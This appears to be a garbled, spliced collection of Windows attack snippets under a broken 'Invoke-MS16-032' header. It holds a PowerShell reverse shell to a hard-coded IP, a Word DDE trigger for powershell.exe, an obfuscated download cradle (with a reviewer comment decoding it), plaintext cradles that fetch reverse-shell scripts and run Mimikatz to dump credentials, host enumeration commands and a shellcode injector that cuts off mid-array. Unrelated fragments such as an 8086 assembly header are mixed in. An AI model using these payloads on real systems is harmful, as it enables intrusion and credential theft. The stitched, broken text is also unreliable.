function Invoke-MS16-032 {
<#
.SYNOPSIS
PowerShell implementation of MS16-032. The exploit targets all vulnerable
operating systems that support PowerShell v2+. Credit for the discovery of
the bug and the logic to exploit it goes to James Forshaw (@tiraniddo).
Targets:
$socket = new-object System.Net.Sockets.TcpClient('165.227.163.161', 443);
"Working"
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
{SET C "{QUOTE 67 58 92 92 80 114 111 103 114 97 109 115 92 92 77 105 99 114 111 115 111 102 116 92 92 79 102 102 105 99 101 92 92 77 83 87 111 114 100 46 101 120 101 92 92 46 46 92 92 46 46 92 92 46 46 92 92 46 46 92 92 119 105 110 100 111 119 115 92 92 115 121 115 116 101 109 51 50 92 92 119 105 110 100 111 119 115 112 111 119 101 114 115 104 101 108 108 92 92 118 49 46 48 92 92 112 111 119 101 114 115 104 101 108 108 46 101 120 101} "}
{DDE {REF C} "a"}
# NOTE(review): obfuscated download cradle, not a new primitive. `$ShellId[1]+$ShellId[13]+'X'`
# ("Microsoft.PowerShell") spells "ieX"; the [Regex]::Matches(...,'.','RightToLeft') | Join reverses
# the quoted string; '9QR' ([char]57+81+82) is swapped for a single quote ([char]39); the result is
# piped into a second IEX built from [string]$VerbosePreference[1,3]+'X'. Decoded, it is exactly the
# plaintext cradle on the following line (IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/frknozr/003310ffa0037aa118eee28af3d3f1d1/raw/.../rev2.ps1')).
# Detection should key on the decoded IEX + DownloadString behaviour and the fetched URL (script block
# logging / AMSI see the decoded form), not on the literal reversed text, which is trivially re-randomised.
.( $sheLLid[1]+$ShellID[13]+'X') ( [sTrING]::JoIn('' ,( [REgEx]::mAtchES( ")''NIOJ-'X'+]3,1[)ECneREFeRPesoBRev$]GNiRts[( ( .|)93]RaHc[]gNIrTs[,)28]RaHc[+18]RaHc[+75]RaHc[((eCALPER.)')RQ91sp.2ver/69bbb'+'534'+'a9'+'c0'+'a8b7dc30'+'2a24'+'6b1c'+'9'+'df5'+'e'+'7fbdeaa/'+'wa'+'r/1d'+'1f3d3fa'+'82eee'+'811aa'+'7300a'+'f'+'f013300/'+'r'+'zo'+'nkrf/'+'m'+'o'+'c'+'.'+'tn'+'etno'+'cr'+'esu'+'buh'+'ti'+'g.tsig'+'//'+':s'+'p'+'tt'+'h'+'RQ9(gni'+'r'+'t'+'Sdaol'+'nwoD.)tne'+'ilCbeW'+'.te'+'N'+' tcejbO'+'-w'+'eN('+' XEI llehsrewo'+'P'( ",'.','r'+'IG'+'h'+'ttoLeFt' )|ForEAch-objECT {$_.ValuE })) )
Powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/frknozr/003310ffa0037aa118eee28af3d3f1d1/raw/aaedbf7e5fd9c1b642a203cd7b8a0c9a435bbb96/rev2.ps1')
Powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m
Powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/frknozr/c301bfa3dc9e1f7c6f7cabd83777b2a2/raw/d660001da6f5f2ee557396772d0f5d1010198d9d/reverse.ps1)
;====================================================================
; Main.asm file generated by New Project wizard
;
; Created: Fri Mar 11 2016
; Processor: 8086
; Compiler: MASM32
;
; Before starting simulation set Internal Memory Size
; in the 8086 model properties to 0x10000
;====================================================================
# Basic post-access host enumeration: current user, local account list, kernel/OS version.
# Reading /etc/passwd only lists accounts (no hashes on a shadow-enabled system).
whoami
cat /etc/passwd
uname -a
$knQoUoTfNfL = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@
$XuqotFCQWLpJY = Add-Type -memberDefinition $knQoUoTfNfL -Name "Win32" -namespace Win32Functions -passthru
[Byte[]] $hbgpyIRNXZNcNzm = 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x